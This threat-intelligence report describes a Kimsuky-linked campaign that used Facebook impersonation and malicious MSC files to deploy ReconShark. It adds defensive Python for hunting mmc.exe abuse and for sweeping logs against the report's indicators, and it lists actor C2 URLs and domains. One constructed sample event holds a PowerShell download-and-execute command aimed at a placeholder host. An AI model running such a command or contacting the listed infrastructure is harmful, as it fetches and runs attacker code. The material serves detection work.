APT attack discovered using Facebook and the Microsoft Management Console (signs of attacks targeting Korea and Japan detected)

May 21, 2024, 11:37 a.m.

Description

A threat actor impersonated a North Korean human rights official on Facebook and used that persona to approach targets, sharing malicious URLs disguised as document links. The lure was a malicious MSC file (a Microsoft Management Console snap-in file, opened by mmc.exe) hosted on the Microsoft OneDrive cloud service; once opened it communicated with C2 servers and deployed ReconShark, a malware family associated with the Kimsuky group. Signs of similar attacks targeting Japan were also observed. Because the initial download came from a legitimate cloud service, reputation-based URL filtering will not catch the delivery stage; the indicators below cover the actor's C2 and staging infrastructure, not the OneDrive link.
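
Since the report names the delivery vehicle (an MSC file opened through mmc.exe) but not a detection, the following added example shows how a hunter would flag that stage in process-creation telemetry. It is not the report's own tooling: the event fields mimic Sysmon Event ID 1, every event is constructed, and the trusted directories, download-location markers and interpreter list are assumptions to tune per environment.

```python
"""
Hunting heuristics for malicious .msc files opened through mmc.exe.

Added example for this report, not the report's own tooling. Event fields
mimic Sysmon Event ID 1 (process creation); every event below is constructed,
and the path lists are assumptions to tune per environment.
"""
import re
from typing import Dict, List, Tuple

# Microsoft's own saved consoles (services.msc, eventvwr.msc, ...) live here;
# a console loaded from anywhere else deserves a look.
TRUSTED_MSC_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Where a phished user's download typically lands (assumption).
USER_WRITABLE_MARKERS = ("\\downloads\\", "\\onedrive\\", "\\temp\\")

# Children a saved console has no business spawning (assumption, extend as needed).
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "curl.exe"}

# A .msc argument, quoted or bare, anywhere on the command line.
MSC_ARG = re.compile(r'"([^"]+\.msc)"|(\S+\.msc)', re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def msc_paths(cmdline: str) -> List[str]:
    """All .msc paths passed on a command line."""
    return [quoted or bare for quoted, bare in MSC_ARG.findall(cmdline)]


def check_event(ev: Dict[str, str]) -> List[str]:
    """Return the reasons an event looks like .msc abuse (empty list = benign)."""
    reasons: List[str] = []
    image = basename(ev.get("Image", ""))
    parent = basename(ev.get("ParentImage", ""))
    if image == "mmc.exe":
        for path in msc_paths(ev.get("CommandLine", "")):
            low = path.lower()
            if not low.startswith(TRUSTED_MSC_DIRS):
                reasons.append(f"mmc.exe loaded a console outside System32: {path}")
            if any(marker in low for marker in USER_WRITABLE_MARKERS):
                reasons.append(f"console came from a download/sync location: {path}")
    if parent == "mmc.exe" and image in INTERPRETERS:
        reasons.append(f"mmc.exe spawned {image}: {ev.get('CommandLine', '')[:80]}")
    return reasons


def hunt(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """(event index, reasons) for every event that trips a heuristic."""
    hits = []
    for i, ev in enumerate(events):
        reasons = check_event(ev)
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed events: a legitimate console, a phished console from Downloads,
# an interpreter spawned by that console, and an unrelated PowerShell launch.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mmc.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\system32\mmc.exe" "C:\Windows\system32\services.msc"'},
    {"Image": r"C:\Windows\System32\mmc.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mmc.exe" "C:\Users\victim\Downloads\report.msc"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mmc.exe",
     # example.invalid is a placeholder, not an indicator from the report
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/d.php')\""},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell.exe"},
]

if __name__ == "__main__":
    for index, why in hunt(SAMPLE_EVENTS):
        print(f"event {index}:")
        for line in why:
            print("   ", line)
```

The first heuristic is deliberately broad (any console outside System32); in a fleet with administrators who keep custom consoles under their profile, restrict it to the download/sync markers or to mmc.exe launches that are followed by an interpreter child within a short window.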

Date

  • Created: May 21, 2024, 11:15 a.m.
  • Published: May 21, 2024, 11:15 a.m.
  • Modified: May 21, 2024, 11:37 a.m.

Indicators

  • 2f7f3a86a868f6c5a85fb12fe028fd254cd9622075b179923187461c72d6aea0
  • 2209f27b08fc10118ef03ca983f1bbdff3ca2371a02382f9f34f64fdcae07ffe
  • 9c6f6db86b5ccdda884369c9c52dd8568733e126e6fe9c2350707bb6d59744a1
  • 52.177.14.24
  • 5.9.123.217
  • 199.59.243.225
  • 162.0.209.91
  • 162.0.209.27
  • http://worldinfocontact.club/111/kfrie/cow.php
  • http://worldinfocontact.club/111/d.php
  • http://rfa.ink/bio/d.php?na=vbtmp
  • http://rfa.ink/bio/d.php?na=battmp
  • http://rapportdown.lol/rapport/com/ca.php?na=video.gif
  • http://rapportdown.lol/rapport/com/
  • http://nuclearpolicy101.org/wp-admin/includes/lee/leeplug/cow.php
  • http://nuclearpolicy101.org/wp-admin/includes/0603/d.php?na=
  • http://nuclearpolicy101.org/wp-admin/includes/0421/d.php?na=vbtmp
  • http://mitmail.tech/gorgon/ca.php?na=video.gif
  • http://mitmail.tech/gorgon/ca.php
  • http://joongang.site/pprb/sec/d.php
  • http://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx
  • http://ielsems.com/romeo/d.php?na=vbtmp
  • http://dusieme.com/panda/d.php?na=vbtmp
  • http://ielsems.com/panda
  • http://dusieme.com/panda/TBS
  • http://dusieme.com/hwp/d.php?na=sched
  • http://dusieme.com/js/cic0117/ca.php?na=dot_emsi.gif
  • http://brandwizer.co.in/green_pad/wp-content/plugins/custom-post-type-marker/ayaka
  • http://brandwizer.co.in/green_pad/wp-content/plugins/custom-post-type-maker/kohei/r.php
  • http://brandwizer.co.in/green_pad/wp-content/plugins/custom-post-type-maker/essay/d.php?na=battmp
  • http://brandwizer.co.in/green_pad/wp-content/plugins/custom-post-type-
  • http://beastmodser.club/sil/0304/d.php?na
  • http://brandwizer.co.in/green_pad/wp-
  • http://beastmodser.club/sil/0304/VOA_Korea.docx
  • worldinfocontact.club
  • rapportdown.lol
  • nuclearpolicy101.org
  • makeoversalon.net.in
  • ielsems.com
  • joongang.site
  • dusieme.com
  • brandwizer.co
  • brandwizer.co.in
  • beastmodser.club
  • yonsei.lol
  • mitmail.tech
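
The indicator list above mixes SHA-256 hashes, IPv4 addresses, full URLs (several cut off in the report) and bare domains, so it cannot be dropped into a log search as-is. The following added example, not part of the report, normalises such a list into typed sets, treats URL indicators as prefixes (which also handles the truncated entries), matches subdomains against bare domains, and runs the result over log lines. The indicator values are copied from the report; the log lines are constructed for the demonstration.

```python
"""
Normalise this report's indicators and sweep log lines for them.

Added example, not the report's own tooling. INDICATORS holds a subset of the
report's values verbatim; SAMPLE_LOGS is constructed for the demonstration.
"""
import re
from typing import Dict, List, Set, Tuple
from urllib.parse import urlsplit

INDICATORS = [
    "2f7f3a86a868f6c5a85fb12fe028fd254cd9622075b179923187461c72d6aea0",
    "52.177.14.24",
    "5.9.123.217",
    "http://rfa.ink/bio/d.php?na=vbtmp",
    "http://worldinfocontact.club/111/d.php",
    "http://brandwizer.co.in/green_pad/wp-",   # truncated in the report; used as a prefix
    "nuclearpolicy101.org",
    "dusieme.com",
    "yonsei.lol",
]

SHA256 = re.compile(r"^[0-9a-f]{64}$", re.IGNORECASE)
IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
DOMAIN = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$", re.IGNORECASE)


def classify(ioc: str) -> str:
    """Indicator type by shape: sha256, ipv4, url, domain or unknown."""
    ioc = ioc.strip()
    if SHA256.match(ioc):
        return "sha256"
    if IPV4.match(ioc):
        return "ipv4"
    if "://" in ioc:
        return "url"
    if DOMAIN.match(ioc):
        return "domain"
    return "unknown"


def build_index(iocs: List[str]) -> Dict[str, Set[str]]:
    """Typed, lower-cased sets; URL hosts are also indexed as domains/IPs."""
    idx: Dict[str, Set[str]] = {"sha256": set(), "ipv4": set(), "url": set(), "domain": set()}
    for ioc in iocs:
        kind = classify(ioc)
        if kind == "unknown":
            continue
        value = ioc.strip().lower()
        idx[kind].add(value)
        if kind == "url":
            host = urlsplit(value).hostname
            if host:
                idx["ipv4" if IPV4.match(host) else "domain"].add(host)
    return idx


def host_matches(host: str, domains: Set[str]) -> bool:
    """Exact or subdomain match: cdn.dusieme.com hits, notdusieme.com does not."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


# Token extractors for free-form log lines.
URL_IN_LOG = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
HASH_IN_LOG = re.compile(r"\b[0-9a-f]{64}\b", re.IGNORECASE)
IP_IN_LOG = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOST_IN_LOG = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.IGNORECASE)


def match_line(line: str, idx: Dict[str, Set[str]]) -> List[Tuple[str, str]]:
    """Sorted (type, value) hits for one log line."""
    hits: Set[Tuple[str, str]] = set()
    for h in HASH_IN_LOG.findall(line):
        if h.lower() in idx["sha256"]:
            hits.add(("sha256", h.lower()))
    for ip in IP_IN_LOG.findall(line):
        if ip in idx["ipv4"]:
            hits.add(("ipv4", ip))
    for url in URL_IN_LOG.findall(line):
        for known in idx["url"]:
            if url.lower().startswith(known):   # prefix match covers truncated IOCs
                hits.add(("url", known))
    for host in HOST_IN_LOG.findall(line):
        if host_matches(host, idx["domain"]):
            hits.add(("domain", host.lower()))
    return sorted(hits)


def scan(lines: List[str], idx: Dict[str, Set[str]]) -> List[Tuple[int, List[Tuple[str, str]]]]:
    """(line number, hits) for every line with at least one hit."""
    return [(n, m) for n, line in enumerate(lines) if (m := match_line(line, idx))]


# Constructed proxy/DNS/EDR lines; only the indicator values are from the report.
SAMPLE_LOGS = [
    '2024-05-20T09:14:02Z proxy user=jdoe method=GET url="http://rfa.ink/bio/d.php?na=vbtmp" status=200',
    '2024-05-20T09:14:05Z dns query=cdn.dusieme.com type=A answer=5.9.123.217',
    '2024-05-20T09:15:00Z proxy user=jdoe method=GET url="https://www.example.com/index.html" status=200',
    '2024-05-20T09:16:30Z edr sha256=2F7F3A86A868F6C5A85FB12FE028FD254CD9622075B179923187461C72D6AEA0 file=report.msc',
    '2024-05-20T09:17:00Z dns query=notdusieme.com type=A answer=203.0.113.5',
]

if __name__ == "__main__":
    index = build_index(INDICATORS)
    for n, found in scan(SAMPLE_LOGS, index):
        print(n, found)
```

Two choices matter in practice: URL indicators are compared as prefixes after lower-casing, so a query-string variation such as `na=battmp` versus `na=vbtmp` still needs its own entry (both appear in the report), and bare domains match any subdomain, which is what you want for actor-controlled domains but would be too broad for a compromised shared host such as a WordPress site.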

Attack Patterns

  • ReconShark (malware)
  • Kimsuky (intrusion set)
  • T1064 (Scripting; deprecated in ATT&CK, superseded by T1059)
  • T1567 (Exfiltration Over Web Service)
  • T1497 (Virtualization/Sandbox Evasion)
  • T1057 (Process Discovery)
  • T1083 (File and Directory Discovery)
  • T1071 (Application Layer Protocol)
  • T1543 (Create or Modify System Process)
  • T1055 (Process Injection)
  • T1219 (Remote Access Software)
  • T1053 (Scheduled Task/Job)
  • T1112 (Modify Registry)
  • T1041 (Exfiltration Over C2 Channel)
  • T1059 (Command and Scripting Interpreter)

Additional Information

  • Japan